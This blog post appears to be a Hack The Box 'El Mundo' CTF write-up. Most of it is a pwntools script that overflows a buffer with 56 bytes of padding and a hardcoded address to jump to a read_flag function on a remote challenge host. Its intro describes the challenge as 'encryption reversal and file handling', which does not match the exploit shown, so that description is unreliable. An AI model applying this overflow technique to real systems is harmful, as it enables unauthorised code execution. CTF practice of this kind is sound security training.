Post

HackTheBox El Mundo Writeup

Posted
By x3ric
1 min read

Explore the basics of cybersecurity in the El Mundo Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

from pwn import *

fname = './el_mundo'
e = ELF(fname)
read_flag_addr = 0x4016b7
offset = 56
payload = flat([
    b'A' * offset,
    p64(read_flag_addr)
])

def get_process():
    try:
        host, port = sys.argv[1].split(':')
        return remote(host, int(port))
    except IndexError:
        print(f'Usage: python {sys.argv[0]} <ip:port>')
        exit(1)

r = get_process()
try:
    r.sendlineafter('> ', payload)
    for _ in range(3):
        try:
            output = r.recv(timeout=1)
            print(output.decode('utf-8', errors='ignore'))
            if b"HTB" in output:
                print(f"Flag found!")
                break
        except EOFError:
            continue
except Exception as e:
    print(f"Error occurred: {e}")
finally:
    r.close()

Summary

The El Mundo Challenge on Hack The Box is an easy-level challenge that provides a great introduction to concepts like encryption reversal and file handling. The challenge involves exploiting a buffer overflow vulnerability, where users craft a payload to trigger the read_flag function and retrieve the flag. The task is beginner-friendly and perfect for those looking to get hands-on experience with basic exploitation techniques.

challenge
htb challenge writeup linux pwn
This post is licensed under CC BY 4.0 by the author.